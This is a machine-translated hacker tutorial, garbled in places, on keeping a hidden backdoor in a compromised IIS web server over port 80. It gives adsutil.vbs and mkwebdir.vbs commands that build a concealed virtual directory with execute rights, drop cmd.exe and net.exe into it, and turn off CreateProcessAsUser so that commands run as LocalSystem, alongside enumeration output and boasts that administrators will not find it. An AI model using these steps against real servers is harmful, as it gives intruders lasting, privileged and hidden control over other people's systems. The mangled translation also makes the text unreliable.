IIS is a more popular WWW server, which is not a lot of vulnerabilities. After invading the IIS server, leave the back door, you can control it at any time. The general rear door programs are open to open a special port to listen, such as NC, NTLM, RNC, etc. are all listening to remote connection control in the server side in a telnet. However, a comparative anti-strict WWW site (after their administrator is suffering), it is generally limited by the firewall to the port, so that other ports cannot be connected in addition to the port of the administrator. But the 80-port is impossible to close (if the administrator does not have the wrong drug). Then we can leave the door in the 80-port to open the back door forever.
When IIS starts the CGI application, the CreateProcessAsUser API is default to create the new Process of the CGI, which is determined by the user who started the CGI. General anonymous users are mapped to IUSR_Computername this account, of course, can be changed by administrators to other users. Or give a legal user by the browser. The user's permissions are relatively low and may belong to members of the Guest group. In fact, we can modify the way IIS opens the CGI to improve permissions. Let's see the IIS main process itself is running under the Localsystem account, so we can get the highest Localsystem permission.
After invasive web servers, it is generally bound to a CMD to a port to remotely control the server. At this point, there can be remote control of the GUI, such as 3389, or control of Telnet text, such as RNC. NC is definitely available, in fact, this is also enough.
Telnet to the server
2. Cscript.exe adsutil.vbs Enum W3SVC / 1 / root
Keytype: (String) "iiswebvirtualdir" approot: (string "/ lm / w3svc / 1 / root" AppFriendlyName: (String) "Default application" Appisolated: (Integer) 2 AccessRead: (Boolean) True AccessWrite: (Boolean) false AccessExecute: (BOOLEAN) false AccessScript: (BOOLEAN) True AccessSource: (BOOLEAN) false AccessNoRemoteRead: (BOOLEAN) false AccessNoRemoteWrite: (BOOLEAN) false AccessNoRemoteExecute: (BOOLEAN) false AccessNoRemoteScript: (BOOLEAN) false httpErrors: (LIST) (32 Items "400, *, file, c: /winnt/help/iishelp/common/400.htm" 401, 1, file, c: /winnt/help/iishelp/common/401-1.htm "401 , 2, File, C: /Winnt/help/iishelp/common/401-2.htm "401, 3, File, C: /Winnt/help/iishelp/common/401-3.htm" "401, 4 , File, C: /Winnt/help/iishelp/common/401-4.htm "401, 5, file, c: /winnt/help/iishelp/common/401-5.htm" 403, 1, File , C: /winnt/help/iishelp/common/403-1.htm "403, 2, file, c: /winnt/help/iishelp/common/403-2.htm" 403, 3, File, C : /Winnt/help/iishelp/common/403-3.htm "" 403, 4, file, c: /winnt/help/iishelp/common/403-4.htm "" 403, 5, f Ile, C: /Winnt/help/iishelp/common/403-5.htm "403, 6, file, c: /winnt/help/iishelp/common/403-6.htm" 403, 7, file, C: /Winnt/help/iishelp/common/403-7.htm "" 403, 8, file, c: /winnt/help/iishelp/common/403-8.htm "403, 9, file, c: /Winnt/help/iishelp/common/403-9.htm "403, 10, file, c: /winnt/help/iishelp/common/403-10.htm" 403 ,11, file, c: / winnt / Help/iishelp/common/403-11.htm "403, 12, file, c: /winnt/help/iishelp/common/403-12.htm" "403, 13, file, c: / winnt / help /iishelp/common/403-13.htm "403, 15, file, c: /winnt/help/iishelp/common/403-15.htm" "
403, 16, File, C: /Winnt/help/iishelp/common/403-16.htm "403, 17, file, c: /winnt/help/iishelp/common/403-17.htm" "404, *, File, C: /Winnt/help/iishelp/common/404b.htm "405, *, file, c: /winnt/help/iishelp/common/405.htm" "406, *, file, c: /Winnt/help/iishelp/common/406.htm "407, *, file, c: /winnt/help/iishelp/common/407.htm" 412, *, file, c: / winnt / help / Iishelp /common/412.htm "" 414, *, file, c: /winnt/help/iishelp/common/414.htm "" 500, 12, File, C: / Winnt / Help / Iishelp / COMMON / 500-12 .htm "500, 13, File, C: /Winnt/help/iishelp/common/500-13.htm" "500, 15, file, c: /winnt/help/iishelp/common/500-15.htm "" 500, 100, URL, / IISHELP / COMMON / 500-100.ASP "FrontPageWeb: (Boolean) True Path: (String)" C: / INETPUB / WWWROOT "AccessFlags: (Integer) 513 [/ W3SVC / 1 / ROOT / LocalStart.asp] [/ w3svc / 1 / root / _vti_pvt] [/ w3svc / 1 / root / _vti_log] [/ w3svc / 1 / root / _private] [/ w3svc / 1 / root / _vti_txt] [/ W3SVC / 1 / Root / _vti_script] [/ w3svc / 1 / root / _vti_cnf] [/ w3svc / 1 / root / _vti_bin]
Don't tell me what you don't know what the above output! ! ! !
Now that we have already had an end, is it! Haha administrator wants to be unlucky
3. MKDIR C: / INETPUB / WWROOT / DIR1 4. Cscript.exe mkwebdir.vbs -c mycomputer -w "default web site" -v "Virtual Dir1", "C: / INETPUB / WWWROOT / DIR1"
This will build a false directory: Virtual Dir1
You can use 1 command to see
5. Next to change the properties of Virtual Dir1 for Execute
Cscript.exe adsutil.vbs set w3svc / 1 / root / virtual dir1 / accesswrite "true" -s: cscript.exe adsutil.vbs set w3svc / 1 / root / virtual dir1 / accessexecute "true" -s:
Now you have UPLOAD content to this directory and you can run. You can also copy cmd.exe net.exe directly to the disk directory of the virtual directory.
6. The following command forces IIS to create new CGI Process by modifying IIS Metabase
Cscript Adsutil.vbs SET / W3SVC / 1 / ROOT / [Your Directory] / CreateProcessasuser False
Note: CScript Windows Script Host.adsutil.vbs Windows Iis Administration Script
Behind IIS Metabase Path
Such back do be almost unable to find unless all false directions are observed (if the administrator writes the suicide note, then he will check it)
Everyone can not be used to do illegal attacks, everything is at your own risk
